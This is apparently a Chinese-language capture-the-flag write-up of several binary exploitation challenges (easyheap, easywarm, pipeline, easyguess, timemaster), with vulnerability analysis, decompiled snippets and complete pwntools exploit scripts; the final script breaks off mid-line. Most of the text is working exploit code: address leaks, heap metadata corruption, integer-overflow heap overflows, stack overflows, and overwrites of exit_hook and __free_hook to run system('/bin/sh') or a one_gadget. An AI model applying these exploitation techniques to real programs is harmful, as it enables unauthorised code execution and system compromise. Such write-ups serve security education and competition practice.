# Target word size (32 or 64) and path of the challenge binary.
arch = 64
challenge = './easyheap'

context.os='linux'
#context.log_level = 'debug'
if arch==64:
    context.arch='amd64'
if arch==32:
    context.arch='i386'

elf = ELF(challenge)
libc = ELF('libc.so')

# Short aliases for the tube methods; `p` is resolved when an alias is called,
# so they may be defined before the connection exists.
rl = lambda a=False : p.recvline(a)
ru = lambda a,b=True : p.recvuntil(a,b)
rn = lambda x : p.recvn(x)
sn = lambda x : p.send(x)
sl = lambda x : p.sendline(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a,b)
irt = lambda : p.interactive()
dbg = lambda text=None : gdb.attach(p, text)
# lg = lambda s,addr : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s,addr))
# NOTE: lg evaluates the *name* it is given; only pass trusted variable names.
lg = lambda s : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s)))
# The pad must be a single byte: b'\x00' (the three-byte b'x00' makes ljust raise).
uu32 = lambda data : u32(data.ljust(4, b'\x00'))
uu64 = lambda data : u64(data.ljust(8, b'\x00'))

# local = 1 starts the binary as a child process, 0 connects to the remote service.
local = 1
if local:
    p = process(challenge)
else:
    p = remote('119.13.105.35','10111')

def debug():
    """Attach GDB to the target with two PIE-relative breakpoints."""
    #gdb.attach(p)
    gdb.attach(p,"b *$rebase(0x1528)\nb *$rebase(0x1AC6)\n")
    #pause()

def cmd(op):
    """Send menu choice `op` once the ">>" prompt has been received."""
    sla(">>",str(op))

def prepare():
    """Choose menu option 1 and answer its "Code: " prompt with the decoded key."""
    cmd(1)
    sla("Code: ","W31C0M3_to_QWB21")

def add(nums):
    """Issue the create command: send the count of `nums`, then each number."""
    sla("$ ", "QWB_Cr34t3")
    sla("need?", str(len(nums)))
    for n in nums:
        sla("num", str(n))

def edit(idx, nums):
    """Issue the modify command for entry `idx` and send every number in `nums`."""
    sla("$ ", "QWB_M0d1Fy")
    sla("modify?", str(idx))
    # Plain iteration: the original loop variable shadowed the `idx` parameter.
    for n in nums:
        sla("num", str(n))

def dele(idx):
    """Issue the delete command for entry `idx`."""
    sla("$ ", "QWB_D3l3Te")
    sla("delete?", str(idx))

def show():
    """Choose option 3 at the ">>" menu."""
    sla(">>", "3")

def exit():
    """Send the goodbye command at the "$ " prompt.

    NOTE: this deliberately shadows the builtin exit(); the script calls it
    to leave the prepare sub-menu, not to stop the interpreter.
    """
    sla("$ ", "QWB_G00dBye")

def challenge(answers, name=None, wait=False):
    """Choose menu option 2 and feed it a sequence of answers.

    answers -- each item is either an int (sent as the answer) or a
               ``(hint, nums)`` pair: ``hint`` is sent as the answer and, when
               it is "whos_your_daddy", ``nums`` is sent at the "Input:" prompt
    name    -- when given, its length and then the name itself are sent at the
               "name?" / "name!" prompts
    wait    -- sleep 0.1 s before every answer
    """
    sla(">>", "2")
    for ans in answers:
        if wait:
            time.sleep(0.1)
        if isinstance(ans, int):
            sla("answer: ", str(ans))
        else:
            hint, nums = ans
            sla("answer: ", hint)
            if hint == "whos_your_daddy":
                sla("Input:", str(nums))
    if name is None:
        return
    sla("name?", str(len(name)))
    sa("name!", name)

#debug()

# Stage 1: leak a libc pointer through the name field and derive libc_base.
prepare()
add([0xFFFFFFFF]*20) #0
dele(0)
add([0x0]*3) #0
exit()
challenge([0x0], "d" * 0x18, True)
show()
ru(b'\xff'*0x18)
leak_addr = u64(p.recv(6).ljust(8, b'\x00'))
libc_base = leak_addr - 0xb7870
success("leak_addr >> "+hex(leak_addr))
success("libc_base >> "+hex(libc_base))

# Stage 2: the unchecked "Input:" index copies heap data (the secret) into mmapg.
prepare()
add([0x0]*3) #1
exit()
challenge([("whos_your_daddy", 1228),("whos_your_daddy", 1221)])

# Stage 3: heap layout.
prepare()
for i in range(9):
    dele(i)
for i in range(3):
    add([0x0] * 14)

# The last two number slots hold 0xdeadbeef010 (low dword, then high dword).
edit(1, [0] * 12 + [0xdbeef010, 0xdea, 0x0])

system = libc_base + 0x50a90
# First two dwords spell "/bin/sh"; the last two carry the address of system.
add([0x6e69622f, 0x68732f] + [0x0] * 8 + [0xdeadbeef, 0x0, 0x0, 0x0, 0xbeefdead, 0x0, 0x0, 0x0, system & 0xffffffff, system >> 32])

for i in range(10):
    add([0x0] * 14)
exit()

stdout = libc_base + 0xb4280
base_address = libc_base + 0xb7a90
stdout_ptr = system + 0x63920
fake_chunk = libc_base + 0xb7cc0

success("base_address >> "+hex(base_address))
success("system >> "+hex(system))
success("fake_chunk >> "+hex(fake_chunk))
success("stdout_ptr >> "+hex(stdout_ptr))
success("break_addr >> "+hex(libc_base + 0x2AB17))

maplen = 1
freeable = 1
# Packed bitfield word of the fake meta (last_idx / freeable / sizeclass / maplen).
last_value = (20 << 6) | (1 << 5) | 1 | (0xfff << 12)

# Stage 4: write the fake meta, one 32-bit answer at a time.
challenge([("next_next", 0), ("next_next", 0),
    0x0, 0x0,
    fake_chunk & 0xffffffff, fake_chunk >> 32, # prev
    stdout_ptr & 0xffffffff, stdout_ptr >> 32, # next
    base_address & 0xffffffff, base_address >> 32, # group
    0x2, 0x0, # masks
    last_value & 0xffffffff, last_value >> 32])

# Stage 5: free the corrupted chunk so dequeue() runs on the fake meta, then
# pick option 4.
#pause()
prepare()
dele(2)
exit()
sla(">>", "4")

p.interactive()

easywarm

1
GNU C Library (Ubuntu GLIBC 2.31-0ubuntu9.2) stable release version 2.31.
1
2
3
4
5
6
easywarm: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=e708c2433f22dc346ad3b92573800150c429996f, for GNU/Linux 3.2.0, stripped
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
  • 64位,dynamically,全开

漏洞分析

程序总体上是实现了一个走迷宫的小游戏,漏洞比较难找

1
2
3
4
5
6
7
if ( sizeg / numg > 15 && sizeg / numg <= 32 )
{
for ( i = 0; i < sizeg / numg / 2; ++i )
v3 = 2 * v3 + 1;
v2 = v3 & (unsigned __int64)&v2;
printf("flag: %lu\n", v3 & (unsigned __int64)&v2);
}
  • 可以泄露 stack_addr 的后4位

程序设置了一个可疑的中断处理:

1
signal(8, (__sighandler_t)hander2);
1
2
3
4
memcpy(*(void **)(key_buf.argv + 8), "666", 3uLL);
memset(s, 0, 0x100uLL);
readlink("/proc/self/exe", s, 0xFFuLL);
execve(s, (char *const *)key_buf.argv, (char *const *)key_buf.env);

找了半天也没弄懂该如何触发,最后在 nowork 中发现了端倪:(有一个除0操作被优化了)

1
2
3
puts("This is a gift for you ^_^ ~");
puts("# system(\"/aidai/ash\"); exists here.");
puts("# I think you must be able to get flag.");

另外程序还有一处溢出:

1
2
memset(&key_buf, 0, sizeg / numg / 2 + 80);
readn(&key_buf, sizeg / numg / 2 + 80);
  • 在 key_buf 中可以溢出2字节

入侵思路

为了触发 stack_addr 泄露,必须先解决迷宫问题:

提取迷宫数据时往往会因为单位字符的长度不同而提取出错,这里我选择用正则表达式解决这个问题

1
2
3
4
5
6
7
8
9
maze = []
ru("\n")
# Read 30 maze rows, trim two characters from each end and map every glyph to
# one digit: flag -> 7, player -> 3, open cell -> 1, wall -> 0.
# NOTE(review): the wall glyph is two characters wide; confirm that the
# open-cell pattern below is meant to be a single space.
for i in range(30):
    data = ru("\n")[2:-2]
    data = re.sub("🚩","7",data)
    data = re.sub("👴","3",data)
    data = re.sub(" ","1",data)
    data = re.sub("██","0",data)
    maze.append(data)

走迷宫的脚本如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
def solve(v):
    """Find a route from the player ('3') to the flag ('7') in a text maze.

    v -- list of equal-length strings; '1' is an open cell, '3' the player,
         '7' the flag and every other character blocks movement.

    Returns ``(found, moves)``: ``moves`` is a string of w/s/a/d steps
    (up/down/left/right) and is empty when no route exists.

    The search is depth-first and tries neighbours in w, s, a, d order.  It
    keeps an explicit stack instead of recursing, so long corridors cannot
    exceed the interpreter's recursion limit.
    """
    border = '0' * len(v[0])
    # Surround the maze with walls so neighbour lookups never leave the grid.
    grid = [list('0' + row + '0') for row in [border] + list(v) + [border]]

    # Locate the player; the last '3' seen wins, (0, 0) when there is none.
    x0, y0 = 0, 0
    for x, row in enumerate(grid):
        for y, cell in enumerate(row):
            if cell == '3':
                x0, y0 = x, y

    steps = (('w', -1, 0), ('s', 1, 0), ('a', 0, -1), ('d', 0, 1))
    path = []
    grid[x0][y0] = '0'  # visited cells are turned into walls
    # Each frame is (x, y, index of the next step to try from that cell).
    pending = [(x0, y0, 0)]
    while pending:
        x, y, k = pending.pop()
        if k == len(steps):
            # Dead end: drop the move that led into this cell (none for the start).
            if path:
                path.pop()
            continue
        pending.append((x, y, k + 1))
        ch, dx, dy = steps[k]
        nx, ny = x + dx, y + dy
        cell = grid[nx][ny]
        if cell == '7':
            path.append(ch)
            return True, ''.join(path)
        if cell == '1':
            grid[nx][ny] = '0'
            path.append(ch)
            pending.append((nx, ny, 0))
    return False, ''.join(path)

name = "LD_DEBUG=all"
sla("name: ",name)

泄露栈地址后4字节后,配合2字节溢出覆盖 key_buf.env 低位,可以劫持环境变量到我们输入 name 的地方

看 wp 得知,设置环境变量 LD_DEBUG=all(12字节) 可以打印出 ld.so 加载库的时候的 log,因此可以得到 libc 的加载地址,效果如下:

1
2
3
4
13304:    file=./libc-2.31.so [0];  needed by ./easywarm1 [0]
13304: file=./libc-2.31.so [0]; generating link map
13304: dynamic: 0x00007ffff7fbfb80 base: 0x00007ffff7dd5000 size: 0x00000000001f14d8
13304: entry: 0x00007ffff7dfc1f0 phdr: 0x00007ffff7dd5040 phnum: 14

最后就是一个 libc 任意写,尝试打 exit_hook:

1
2
3
4
5
pwndbg> p rtld_lock_default_lock_recursive
$1 = {void (void *)} 0x7ffff7fd0150 <rtld_lock_default_lock_recursive>
pwndbg> search -t qword 0x7ffff7fd0150
Searching for value: b'P\x01\xfd\xf7\xff\x7f\x00\x00'
ld-2.31.so 0x7ffff7ffdf68 0x7ffff7fd0150

PS:从 wp 中学到的,打 __libc_atexit 也是个不错的选择

1
2
3
4
5
6
__libc_atexit:00000000001ED608                               __libc_atexit segment qword public 'DATA' use64
__libc_atexit:00000000001ED608 assume cs:__libc_atexit
__libc_atexit:00000000001ED608 ;org 1ED608h
__libc_atexit:00000000001ED608 E0 5E 09 00 00 00 00 00 off_1ED608 dq offset fcloseall_0 ; DATA XREF: sub_49930+1DA↑o
__libc_atexit:00000000001ED608 ; sub_5EED0+1672↑o
__libc_atexit:00000000001ED608 ; sub_5EED0+1E37↑o

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
# -*- coding:utf-8 -*-
from pwn import *
import re

# Target word size (32 or 64) and path of the challenge binary.
arch = 64
challenge = './easywarm1'

context.os='linux'
#context.log_level = 'debug'
if arch==64:
    context.arch='amd64'
if arch==32:
    context.arch='i386'

elf = ELF(challenge)
libc = ELF('libc-2.31.so')

# Short aliases for the tube methods; `p` is resolved when an alias is called,
# so they may be defined before the connection exists.
rl = lambda a=False : p.recvline(a)
ru = lambda a,b=True : p.recvuntil(a,b)
rn = lambda x : p.recvn(x)
sn = lambda x : p.send(x)
sl = lambda x : p.sendline(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a,b)
irt = lambda : p.interactive()
dbg = lambda text=None : gdb.attach(p, text)
# lg = lambda s,addr : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s,addr))
# NOTE: lg evaluates the *name* it is given; only pass trusted variable names.
lg = lambda s : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s)))
# The pad must be a single byte: b'\x00' (the three-byte b'x00' makes ljust raise).
uu32 = lambda data : u32(data.ljust(4, b'\x00'))
uu64 = lambda data : u64(data.ljust(8, b'\x00'))

# local = 1 starts the binary (with argv[1] = "000") as a child process,
# 0 connects to the remote service.
local = 1
if local:
    p = process([challenge,"000"])
else:
    p = remote('119.13.105.35','10111')

def debug():
    """Attach GDB with a PIE-relative breakpoint, then wait for a key press."""
    #gdb.attach(p)
    gdb.attach(p,"b *$rebase(0x180A)\n")
    pause()

def cmd(op):
    """Send menu choice `op` once the "[-]" prompt has been received."""
    sla("[-]",str(op))

def add(num,size):
    """Menu option 1: answer the complexity prompt with `num` and the length prompt with `size`."""
    cmd(1)
    sla(" complexity: ",str(num))
    sla("length: ",str(size))

def show():
    """Choose menu option 4."""
    cmd(4)

def free():
    """Choose menu option 5."""
    cmd(5)

def challenge(data):
    """Menu option 3: send `data` at the "input: " prompt."""
    cmd(3)
    sla("input: ",data)

def magic():
    """Send the menu value 0x666 (sent as its decimal string)."""
    cmd(0x666)

def solve(v):
    """Find a route from the player ('3') to the flag ('7') in a text maze.

    v -- list of equal-length strings; '1' is an open cell, '3' the player,
         '7' the flag and every other character blocks movement.

    Returns ``(found, moves)``: ``moves`` is a string of w/s/a/d steps
    (up/down/left/right) and is empty when no route exists.

    The search is depth-first and tries neighbours in w, s, a, d order.  It
    keeps an explicit stack instead of recursing, so long corridors cannot
    exceed the interpreter's recursion limit.
    """
    border = '0' * len(v[0])
    # Surround the maze with walls so neighbour lookups never leave the grid.
    grid = [list('0' + row + '0') for row in [border] + list(v) + [border]]

    # Locate the player; the last '3' seen wins, (0, 0) when there is none.
    x0, y0 = 0, 0
    for x, row in enumerate(grid):
        for y, cell in enumerate(row):
            if cell == '3':
                x0, y0 = x, y

    steps = (('w', -1, 0), ('s', 1, 0), ('a', 0, -1), ('d', 0, 1))
    path = []
    grid[x0][y0] = '0'  # visited cells are turned into walls
    # Each frame is (x, y, index of the next step to try from that cell).
    pending = [(x0, y0, 0)]
    while pending:
        x, y, k = pending.pop()
        if k == len(steps):
            # Dead end: drop the move that led into this cell (none for the start).
            if path:
                path.pop()
            continue
        pending.append((x, y, k + 1))
        ch, dx, dy = steps[k]
        nx, ny = x + dx, y + dy
        cell = grid[nx][ny]
        if cell == '7':
            path.append(ch)
            return True, ''.join(path)
        if cell == '1':
            grid[nx][ny] = '0'
            path.append(ch)
            pending.append((nx, ny, 0))
    return False, ''.join(path)

# The name doubles as an environment string: once key_buf.env points at it,
# the re-executed program prints the loader's debug log.
name = "LD_DEBUG=all"
sla("name: ",name)

add(1,28)
show()

# Read 30 maze rows, trim two characters from each end and map every glyph to
# one digit: flag -> 7, player -> 3, open cell -> 1, wall -> 0.
# NOTE(review): the wall glyph is two characters wide; confirm that the
# open-cell pattern below is meant to be a single space.
maze = []
ru("\n")
for i in range(30):
    data = ru("\n")[2:-2]
    data = re.sub("🚩","7",data)
    data = re.sub("👴","3",data)
    data = re.sub(" ","1",data)
    data = re.sub("██","0",data)
    maze.append(data)

for i in maze:
    print(i)

ok,ans = solve(maze)
# Give up when the route is longer than 96 moves.
if len(ans)>96:
    exit()
challenge(ans)

# The game prints the masked low bits of a stack address as "flag: <n>".
ru("flag: ")
# NOTE(review): eval() runs on data received from the target; int() would be
# the safer parser for this decimal number.
leak_addr = eval(ru("\n"))
success("leak_addr >> "+hex(leak_addr))

add(1,32)

# 96 filler bytes, then two bytes that overwrite the low half of key_buf.env.
payload = "a"*96+p16(leak_addr+136)
challenge(payload)

magic()
# Take the "dynamic:" address from the loader log; the last hex digit is
# dropped and replaced by 0 through the multiplication.
ru(" dynamic: ")
# NOTE(review): eval() on remote data again; int(text, 16) would avoid it.
leak_addr = eval(ru(" ")[:-1])*0x10
libc_base =leak_addr - 0x1eab80
success("leak_addr >> "+hex(leak_addr))
success("libc_base >> "+hex(libc_base))

system = libc_base + libc.sym["system"]
one_gadgets = [0xe6aee,0xe6af1,0xe6af4]
one_gadget = libc_base + one_gadgets[0]
exit_hook = libc_base + 0x228f68

success("one_gadget >> "+hex(one_gadget))
success("exit_hook >> "+hex(exit_hook))

offset = exit_hook - 0xadad000
success("offset >> "+hex(offset))

#debug()

# Arbitrary write: send the offset of the target, then the value to store there.
ru("Administrator mode")
sa("error?",p64(offset))
success("one_gadget >> "+hex(one_gadget))
sla("to record?",p64(one_gadget)+"a"*8)

p.interactive()

pipeline

1
GNU C Library (Ubuntu GLIBC 2.31-0ubuntu9.2) stable release version 2.31.
1
2
3
4
5
6
pipeline: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=1660ac5f889c59866adfdd8ab506d59e2951e03a, for GNU/Linux 3.2.0, stripped
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
  • 64位,dynamically,全开

漏洞分析

程序对 size 大小有检查:(导致不能使用 mmap 进行分配)

1
2
3
chunkg = malloc(0x10uLL);
*chunkg = chunkg + 2;
chunkg[1] = 0x21000LL;
1
2
3
4
5
if ( a1 < *chunkg || (result = *chunkg + chunkg[1], a1 >= result) )
{
puts("error");
exit(0);
}

程序对 offset 也有检查:(导致 offset 不能为负数)

1
2
if ( (signed int)chunk->offset >= chunk->size || (chunk->offset & 0x80000000) != 0 )
chunk->offset = 0;

整数溢出导致堆溢出:

1
2
3
4
size2 = chunk->size - chunk->offset;
if ( size <= size2 )
LOWORD(size2) = size;
readn((__int64)chunk->data + (int)chunk->offset, (__int16)size2);
  • chunk->offset 是 unsigned int 类型,但 readn 中将其识别为 int
  • LOWORD(size2) = size 中,4字节的 size2 只有低2字节被覆盖,可能导致堆溢出
  • 如果我们输入 0x80000200(负数),程序就会进入 if 语句,但最终只有 0x200 被覆盖到 size2

入侵思路

程序没有 free,只有一个 realloc 可以利用:

1
2
3
chunk->offset = input_num("offset: ");
chunk->size = input_num("size: ");
chunk->data = realloc_s(chunk->data, chunk->size);

申请一个大堆块,然后 realloc 一个更大的堆块,配合堆风水就可以泄露 libc_base 和 heap_base

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
add()#0
add()#1
add()#2
add()#3
add()#4
add2(0,0,0x450)
add()#5
add2(1,0,0x460)
add2(0,0,0x500)
add2(2,0,0x10)

show(2)
ru("data: ")
leak_addr = u64(p.recv(6).ljust(8,"\x00"))
libc_base = leak_addr - 0x1ebfe0
success("leak_addr >> "+hex(leak_addr))
success("libc_base >> "+hex(libc_base))

add2(1,0,0x500)
add2(3,0,0x430)
add2(4,0,0x40)
edit(4,0x10,"a"*0x10)

show(4)
ru("data: ")
ru("aaaaaaaaaaaaaaaa")
leak_addr = u64(p.recv(6).ljust(8,"\x00"))
heap_base = leak_addr - 0x7d0
success("leak_addr >> "+hex(leak_addr))
success("heap_base >> "+hex(heap_base))

由于程序的限制不能直接劫持 tcache,因此需要劫持程序的单链表结构,然后直接修改 free_hook 即可

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
# -*- coding:utf-8 -*-
from pwn import *

# Target word size (32 or 64) and path of the challenge binary.
arch = 64
challenge = './pipeline1'

context.os='linux'
#context.log_level = 'debug'
if arch==64:
    context.arch='amd64'
if arch==32:
    context.arch='i386'

elf = ELF(challenge)
libc = ELF('libc-2.31.so')

# Short aliases for the tube methods; `p` is resolved when an alias is called,
# so they may be defined before the connection exists.
rl = lambda a=False : p.recvline(a)
ru = lambda a,b=True : p.recvuntil(a,b)
rn = lambda x : p.recvn(x)
sn = lambda x : p.send(x)
sl = lambda x : p.sendline(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a,b)
irt = lambda : p.interactive()
dbg = lambda text=None : gdb.attach(p, text)
# lg = lambda s,addr : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s,addr))
# NOTE: lg evaluates the *name* it is given; only pass trusted variable names.
lg = lambda s : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s)))
# The pad must be a single byte: b'\x00' (the three-byte b'x00' makes ljust raise).
uu32 = lambda data : u32(data.ljust(4, b'\x00'))
uu64 = lambda data : u64(data.ljust(8, b'\x00'))

# local = 1 starts the binary as a child process, 0 connects to the remote service.
local = 1
if local:
    p = process(challenge)
else:
    p = remote('119.13.105.35','10111')

def debug():
    """Attach GDB to the target with a PIE-relative breakpoint."""
    #gdb.attach(p)
    gdb.attach(p,"b *$rebase(0x188A)\n")
    #pause()

def cmd(op):
    """Send menu choice `op` once the ">> " prompt has been received."""
    sla(">> ",str(op))

def add():
    """Choose menu option 1 (it takes no further input)."""
    cmd(1)

def add2(index,offset,size):
    """Menu option 2: set `offset` and `size` for entry `index`.

    `offset` and `size` may be ints (sent as decimal text) or ready-made
    strings, which are sent unchanged.
    """
    cmd(2)
    sla("index: ",str(index))
    sla("offset: ",str(offset) if isinstance(offset, int) else offset)
    sla("size: ",str(size) if isinstance(size, int) else size)

def dele(index):
    """Menu option 3 for entry `index`."""
    cmd(3)
    sla("index: ",str(index))

def edit(index,size,data):
    """Menu option 4: write `data` into entry `index`.

    `size` may be an int (sent as decimal text) or a ready-made string such
    as a negative number, which is sent unchanged.
    """
    cmd(4)
    sla("index: ",str(index))
    sla("size: ",str(size) if isinstance(size, int) else size)
    sla("data: ",data)

def show(index):
    """Menu option 5 for entry `index`."""
    cmd(5)
    sla("index: ",str(index))

# Heap grooming: create the entries, then resize some of them (option 2) so
# that entry 2's small buffer still contains a stale libc pointer.
add()#0
add()#1
add()#2
add()#3
add()#4
add2(0,0,0x450)
add()#5
add2(1,0,0x460)
add2(0,0,0x500)
add2(2,0,0x10)

# Leak 1: the six bytes printed after "data: " are a libc address.
show(2)
ru("data: ")
leak_addr = u64(p.recv(6).ljust(8,"\x00"))
libc_base = leak_addr - 0x1ebfe0
success("leak_addr >> "+hex(leak_addr))
success("libc_base >> "+hex(libc_base))

add2(1,0,0x500)
add2(3,0,0x430)
add2(4,0,0x40)
# Fill the first 0x10 bytes so the output runs on into the pointer behind them.
edit(4,0x10,"a"*0x10)

# Leak 2: the six bytes after the 16 'a' characters are a heap address.
show(4)
ru("data: ")
ru("aaaaaaaaaaaaaaaa")
leak_addr = u64(p.recv(6).ljust(8,"\x00"))
heap_base = leak_addr - 0x7d0
success("leak_addr >> "+hex(leak_addr))
success("heap_base >> "+hex(heap_base))

free_hook = libc_base + libc.sym["__free_hook"]
system = libc_base + libc.sym["system"]

#debug()
add()#6
add2(6,0,0x3f0)
add2(5,0,0x100)
add()#7

# -2147483136 is 0x80000200 as a signed 32-bit value: it passes the size check
# as a negative number while only its low 16 bits (0x200) reach readn, so the
# write runs past entry 5's 0x100-byte buffer.
# presumably the data after the 0x21 size field replaces the next entry's
# data pointer (free_hook-0x8) and offset/size pair — TODO confirm the layout
payload = "a"*0x108+p64(0x21)+p64(free_hook-0x8)+p64(0x50000000000)
edit(5,"-2147483136",payload)
# Entry 7 now writes at free_hook-0x8: 8 bytes of "/bin/sh", then system
# lands on __free_hook itself.
payload = "/bin/sh\x00" + p64(system)
edit(7,0x20,payload)

# Put "/bin/sh" into entry 0, then resize it to 0.
# presumably a zero-size resize frees the buffer and so fires the hook — TODO confirm
edit(0,0x10,"/bin/sh\x00")
add2(0,0,0)

p.interactive()

easyguess

1
2
3
4
5
6
easyguess: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=82ca2e649768e48e033662e11193e6e486b37089, not stripped
Arch: i386-32-little
RELRO: No RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
  • 32位,dynamically,NX

入侵思路

获取随机数后打栈溢出

完整 exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
# -*- coding:utf-8 -*-
from pwn import *
from ctypes import *

# Target word size (32 or 64) and path of the challenge binary.
arch = 32
challenge = './easyguess'

# The host C library, loaded through ctypes so the script can call rand() itself.
libc = cdll.LoadLibrary("libc.so.6")

context.os='linux'
#context.log_level = 'debug'
if arch==64:
    context.arch='amd64'
if arch==32:
    context.arch='i386'

elf = ELF(challenge)

# Short aliases for the tube methods; `p` is resolved when an alias is called,
# so they may be defined before the connection exists.
rl = lambda a=False : p.recvline(a)
ru = lambda a,b=True : p.recvuntil(a,b)
rn = lambda x : p.recvn(x)
sn = lambda x : p.send(x)
sl = lambda x : p.sendline(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a,b)
irt = lambda : p.interactive()
dbg = lambda text=None : gdb.attach(p, text)
# lg = lambda s,addr : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s,addr))
# NOTE: lg evaluates the *name* it is given; only pass trusted variable names.
lg = lambda s : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s)))
# The pad must be a single byte: b'\x00' (the three-byte b'x00' makes ljust raise).
uu32 = lambda data : u32(data.ljust(4, b'\x00'))
uu64 = lambda data : u64(data.ljust(8, b'\x00'))

# local = 1 starts the binary as a child process, 0 connects to the remote service.
local = 1
if local:
    p = process(challenge)
else:
    p = remote('119.13.105.35','10111')

def debug():
    """Attach GDB with a breakpoint at 0x08048594, then wait for a key press."""
    gdb.attach(p,"b *0x08048594\n")
    #gdb.attach(p,"b *$rebase(0x1409)\nb *$rebase(0x137A)\n")
    pause()

def cmd(op):
    """Send menu choice `op` once the ">" prompt has been received."""
    sla(">",str(op))

#debug()

# Fixed addresses inside the non-PIE binary.
back_door = 0x804867A
binsh_addr = 0x8049A30
pop_edi_pop_ebp_ret = 0x080486fa  # not used by the payload below

# Answer the three guesses with the first three values of the local rand().
# presumably the target draws from the same unseeded sequence — TODO confirm
sla("You have three times",str(libc.rand()))
sl(str(libc.rand()))
sl(str(libc.rand()))

# 24 + 8 filler bytes, then back_door and binsh_addr.
# NOTE(review): binsh_addr sits directly after the new return address, where a
# cdecl return address would be expected — verify how back_door takes its argument.
payload = "a"*24 +"b"*8 + p32(back_door) +p32(binsh_addr)
sla("to pwn it!",payload)

p.interactive()

pwn_timemaster

1
GNU C Library (Ubuntu GLIBC 2.31-0ubuntu9.7) stable release version 2.31.
1
2
3
4
5
6
pwn: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter ./tools/glibc-all-in-one/libs/2.31-0ubuntu9.7_amd64/ld-2.31.so, for GNU/Linux 3.2.0, BuildID[sha1]=671697b357d39525a86658e92e5aa52b783012ff, not stripped
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x3ff000)
  • 64位,dynamically,Canary,NX

漏洞分析

有栈溢出,需要泄露 canary:

1
2
3
4
5
6
7
8
9
10
11
_BOOL8 ask_again()
{
char v1[24]; // [rsp+0h] [rbp-20h] BYREF
unsigned __int64 canary; // [rsp+18h] [rbp-8h]

canary = __readfsqword(0x28u);
printf("Play again? (Y/n) ");
__isoc99_scanf("%s", v1); // 栈溢出
readuntil(10);
return v1[0] != 'n' && v1[0] != 'N';
}

入侵思路

1
2
printf("Time[sec]: ");
__isoc99_scanf("%lf", a1);

函数 scanf 可能会因为格式不同而写入失败,导致 time 不会被初始化

通过前面的函数可以调节栈指针,使局部变量 time 正好指向 canary:

1
chunk = alloca(0x10 * ((8 * time + 0x1E) / 0x10));

这样就会导致 canary 被泄露出来:

1
2
ask_time(&time);
printf("Stop the timer as close to %lf seconds as possible!\n", time);
  • PS:这里是以 double 类型泄露的,当时想现写一个函数用于“转义”,可能是中间的步骤写错了导致出来的数据很乱(浪费了不少时间)

后来看学弟用 struct.pack + binascii.hexlify 来处理数据,效果很好:

1
2
3
4
leak_addr = ru(" ")[:-1]
leak_addr = struct.pack("<d", float(leak_addr))
leak_addr = str(binascii.hexlify(leak_addr)[::-1])
success("leak_addr >> "+leak_addr)

最后的操作就比较朴素了,用 puts 来泄露 libc_base,写入并执行 ask_again 然后劫持返回地址为 system

完整 exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
from pwn import *

# Target word size (32 or 64) and path of the challenge binary.
arch = 64
challenge = './pwn1'

context.os='linux'
#context.log_level = 'debug'
if arch==64:
    context.arch='amd64'
if arch==32:
    context.arch='i386'

elf = ELF(challenge)
libc = ELF('libc-2.31.so')

# local = 1 starts the binary as a child process, 0 connects to the remote service.
local = 1
if local:
